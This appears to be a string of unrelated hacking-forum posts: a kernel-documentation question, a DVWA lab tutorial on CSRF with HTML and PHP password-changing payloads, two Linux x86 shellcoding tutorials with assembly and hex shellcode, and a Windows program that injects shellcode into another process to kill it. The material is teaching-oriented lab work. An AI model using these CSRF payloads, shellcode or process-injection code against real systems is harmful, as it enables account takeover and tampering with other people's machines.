So I started to do some kernel dev and the biggest problem is all the books are on Kernel 2.6.x while there are some major changes in kernel after 3.2 or around that. I started this book on writing device drivers, in the starting all was good, the part where I got lost is as the book is on kernel 2.6.10, it explains structures file_operations, inode, file and some more in a good way but the problem is the structure members are changed, some are added, some are removed and I didn't find a way to look for the documentation of these members, structures, functions.
I failed to find something that has some good explanation of the stuff added, and am lost. Any resource on where I can look for to get a good understanding of stuff?

P.S. I was  quite confused where to post it so 

Just found it while reading an article on Tesla, here you go

http://www.geekboy.co/geekboy/50-websites-to-learn-how-to-code-for-free/

CSRF means Cross-Site Request Forgery
With that being said, let us see what is it to get an understanding of it so that we can exploit it

According ot OWASP, Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.

So you can see how powerful this attack can be, of course when the web application is vulnerable, let's try to exploit it from the very basics, or you can say, from the ground up

Requirements

1. A web browser (kinda obvious, right)
2. A web server (am using XAMPP)
3. DVWA
4. Mind (as I don't want you to just blindly reproduce everything said in the tut and getting no knowledge)
5. A proxy ( this is optional as it will allow you to see how your request is going and what is repsonse)

Setup
Just setup DVWA and set its security to LOW as we are starting and then move onto the CSRF section.



Here, you see an option to change your password, a regular password changing prompt, huh? Just enter a new password, type again to confirm and click on change (I used trying as the new password), you'll see something like this.



Now see the URL, it has the request it sent to the server getting reflected in the URL bar of your browser (please note that this is not a case always but since it is showing here, we'll take the advantage of this) or otherwise you can pass the request from the proxy and see what is it requesting the server

Putting the hands in the mud : Beating Low Security

In the URL bar, change the password_new=trying&password_conf=trying to password_new=it_works&password_conf=it_works and submit it and you'll see your password got changed to it_works. Yeah, I know this is the same what we did above but it was just to make sure you don't forget it

Now, think you are not a DVWA user but you need to change his password to System7 and you know that it is vuln to CSRF and you also know the request (what was in the URL bar), so, let's see how you'll exploit it.
Make an HTML page with minimal code so as to accomplish the task.



Here is the source of my HTML page that I used.
<html>

<head>
<title>Change Password ;)</title>
</head>

<body>
<a href="http://127.0.0.1/dvwa/vulnerabilities/csrf/?password_new=System7&password_conf=System7&Change=Change#">Click me ;)</a>
</body>
</html>

Here, we just constructed a URL that will change the password to System7. To get this executed, you can use social engineering and get the dumbass click on it and his password will change.



That was the LOW security CSRF on DVWA. Now, we'll see how to evade a simple filter that is applied to make the web app secure but that doesn't makes it secure.

Getting deeper in mud

Set the DVWA Security to Medium and come back to CSRF again

Now if you try to change the password via that html file, you'll see an error.



As you can see, it says That request didn't look correct. and you failed to change the password. We can take 2 approaches here, White box and black box but since we have access to source code, we'll take the white box approach. When you click on View Source button, you see the source code and what actually tests the authenticity of the request is this line // Checks to see where the request came from
    if( eregi( $_SERVER[ 'SERVER_NAME' ], $_SERVER[ 'HTTP_REFERER' ] ) )

About eregi function, it checks the occurrence of first string into the second string and returns the length of the matched string else returns FALSE.
I dunno what the fuck was wrong with my system today, I was unable to intercept the request or I would have shown you what was causing the problem.

Solution -> In the eregi function, we see that $_SERVER[ 'SERVER_NAME' ], which is 127.0.0.1 in our case is being searched withing the HTTP_REFERER field in the password changing request. Good thing is we can set this (or any header field calue on our own), but that is done in PHP, so we'll write a PHP file that will contain the following code:
<html>

<?php

header("Referer: 127.0.0.1");

?>

<a href="http://127.0.0.1/dvwa/vulnerabilities/csrf/?password_new=Fucked&password_conf=Fucked&Change=Change#">Click me, I'll do it now ;)</a>
</html>

Save it as do_it.php in your web root directory and open it.



Now click on the Click me, I'll do it now and you'll see the password changed in the URL bar.



You can also verify this thing in your proxy

so, hope you guys got the basics of CSRF.
Any questions??

Here's the part 2 of my previous tut HERE

I would recommend reading my previous tut before starting this one

Moving on to mkdir shellcode, this shellcode creates a directory with permissions 777 means read, write and execute for all.

Algorithm
Make umask 0, then create a directory with permission 777 (in octal) and simply exit.

Now the question arises why did we make umask 0?
The answer lies in the functioning of mkdir, if you pass mkdir some permissions for creating a directory, it assigns the permission of the newly created directory to ~umask & (permission) so by making umask 0, ~umask = 11111111 (NOTE ; here every 1 corresponds to a bit),  which means whichever permission you give for the directory, they'll be applied as it is. Got it? Cool.. let's move your ass further.

I've removed all the nulls from the shellcode, made it PIC and here is the shellcode \x31\xdb\xf7\xe3\xb0\x3c\xcd\x80\x31\xc9\x5b\xb0\x27\x66\xb9\xff\x01\xcd\x80\xb0\x01\xcd\x80\xe8\xe4\xff\xff\xff\x48\x61\x63\x6b\x65\x64
In assembly, it is .text

.globl _start

shellcode:

xorl %ebx, %ebx
mull %ebx
movb $60, %al
int $0x80                                      # umask syscall on x86 system

xorl %ecx, %ecx
popl %ebx
movb $39, %al
movw $0777, %cx
int $0x80                                # mkdir syscall

movb $1, %al
int $0x80                               # Exit syscall

_start:
call shellcode
.asciz "Hacked"      # Name of the directory to be created

If you know assembly, the code is fairly self explanatory, if you're having problems understanding what the fuck I've given, go learn assembly 



After putting the shellcode in a C program, we verify it


Now you've create a directory with permission 777, go play with it

A cool guide on writing Unmaintainable Code , I'm sure you'd love it.
Here -> http://www.mindprod.com/jgloss/unmain.html

So I was learning to write a little bit windows shellcoding and this guy showed in his tut that we'll be writing a shellcode to kill any process. Everything was working fine, in his video,his code worked fine but when I did all, mine didn't work so I decided to use Olly and trace where the fuck in the problem. I ran the code in Olly and it worked FINE, I mean yes, it worked in the debugger but when I run this outside the debugger, it just doesn't work. I don't really see any problem, and maybe there isn't cause in the debugger, everything running fine but it isn't running out of the debugger.
Here's the code #include<Windows.h>
#include<stdio.h>


char shellcode[] = {"\x6A\x00\x6A\xFF\xE8\x01\x00\x00\x00\xC3\xB8\x01\x01\x00\x00\xE8\x00\x00\x00\x00\x89\xE2\x0F\x34"};

DWORD shellcode_size = 0x18;
DWORD shellcode_offset = 0x00;

/*
The shellcode is :
push 0
push -1
call TERM
ret
TERM:
mov eax, 101h
call sys
sys:
mov edx, esp
syscall
ret
*/

void kill_app(DWORD pid){

char code[0x18];

memcpy(code, shellcode, 0x18);

HMODULE h = GetModuleHandle("NTDLL.DLL");
FARPROC f = GetProcAddress(h, "ZwTerminateProcess");
memcpy((char *)(shellcode+0x0B), (char *)((char *)f+1), 4);

HANDLE hProc = 0;

hProc = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_CREATE_THREAD, FALSE, pid);

LPVOID hRemoteMem = VirtualAllocEx(hProc, NULL, 0x18, MEM_COMMIT, PAGE_EXECUTE_READWRITE);


DWORD numberBytesWritten = 0;

WriteProcessMemory(hProc, hRemoteMem, shellcode, 0x18, &numberBytesWritten);

HANDLE HRemoteThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)hRemoteMem, 0, 0, NULL);


CloseHandle(hProc);
}

int main(int argc, CHAR* argv[])
{
if (argc != 2)
{
printf("Usage: %s <pid_of_program_to_close>\n\n", argv[0]);
return 1;
}

DWORD pid = atoi(argv[1]);

kill_app(pid);
return 0;
}


Explanation: I write the shellcode, then get the address of ZwTerminateProcess function from ntdll.dll, then I open the process into which I have to execute this, then I allocate the memory, write it into the process memory, create a thread, run the code and since the shellcode is of exiting the process, it should kill the process of the given pid.

So it was a regular day on IRC and iTpHo3NiX asked me to write a tut a tut on something like shellcoding or CSRF or something else. I was going for CSRF but that needed to setup a web server and vuln shit so I decided to write on shellcoding Without further ado, let's begin.


Requirements

• An x86 linux based OS (for simplifying the process)
• Decent knowledge of Assembly language
• A brain( without it, you can't do, trust me)

Alright, we are ready to start.

What really is a shellcode?
From wikipedia - a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine, but any piece of code that performs a similar task can be called shellcode. Typically written in machine language
Too lazy to define myself :p

Let's get started

One thing to note : the shellcode is just like any other piece of code written in assembly language, it can be anything you want, from a hello world printing code to reverse connect shell code to adding users with root priv and anything, possiblities are just endless. We just need to take care of some stuff and I'll be explaining that to you, just keep going.

We'll start with a hello world code :
.data
Hello: .ascii "Hello\n"
.text

.globl _start

_start:
# Printing Hello to the screen

movl $4, %eax
movl $1, %ebx
leal Hello, %ecx
movl $6, %edx
int $0x80

# Exiting gracefully
movl $1, %eax
movl $0, %ebx
int $0x80


Now, it prints simply Hello on the command line and exits but the question is can we use this as shellcode? Umm... no because it got a fundamental problem with it and that is the address of the string is statically-binded into the program and when it is injected into another program's memory( as payload ), it won't work as that address may contain something else in that program's memory.

In the screenshot, you can see the highlighted part is the address of the string and is statically binded.

To overcome this problem, we'll have to write a PIC( Position Independent Code) so as to calculate its (string's) location on the fly when it is injected in the memory of a vuln program to execute this

Techniques for writing shellcode
There are bascailly (mostly used) 2 techniques for writing the shellcode :

• CALL-POP

Well, the original is JMP-CALL-POP but I do a CALL-POP as it saves 2 bytes Reason I described here - ShellcodeGod

• Stack Method

I'll be using CALL-POP here, will use stack technique when it is required.
 


Writing the PIC
To get around this problem, we'll use the fact that when the call instruction is executed, it pushes the address of next instruction on the stack as a return address and we'll make this return address point to the string

.text

.globl _start


execute:
# Printing Hello to the screen
xorl %eax, %eax
xorl %ebx, %ebx
xorl %edx, %edx

movb $4, %al
movb $1, %bl
popl %ecx # Poping the address of the string in the ECX register
movb $6, %dl
int $0x80

# Exiting gracefully
movb $1, %al
int $0x80

_start:
call execute
hello: .ascii "Hello\n"


Here, in the output you can see I assembled it simply and if you see the output of the both runs, both runs perfectly and in the disassembly of the PIC code, there is NO HARDCODED ADDRESS so we overcame the fundamental problem and this is ready to be used in the shellcode (I also optimized the shellcode and removed the nulls).



Let's try this as shellcode.

You may be thinking that ok, we got it running, we made it PIC but how will we put this in the memory?
Ans. To put this into a program's memory and run this, inject this as a char array of opcodes. What do I mean by that is disassemble the elf file (your shellcode) using objdump and extract the opcodes and then arrange them in order as an array and then make the return pointer to overwrite the return address with your shellcode's address so when the C program(given below) exits, it'll jump to your shellcode and therefore it'll execute this and we are done.
Use the bash script given below to automate this for you


Cool.. it worked perfectly

Note : I used this shell script from Here (actually the first comment) to dump the opcodes from the objdump output.

for i in `objdump -d $1 | tr '\t' ' ' | tr ' ' '\n' | egrep '^[0-9a-f]{2}$' ` ; do echo -n "\x$i" ; done
The C code for testing the shellcode is #include<stdio.h>

char shellcode[] = ""; // Your shellcode's opcodes in the double quotes

int main(void){

int *ret;

ret = (int *)&ret + 2;

(*ret) = (int)shellcode;


}

Well, this is the brief intro to shellcoding. What do I have in mind for the next post is to continue this and will teach you how to write some usable shellcode as payload like making directory with permission 777 and how to execute a shell
Stay tuned.

I don't know why the fuck the images are blurry, they were crystal clear when I checked them but whatever.

If you have any doubts, just ask and if suggestions, I welcome them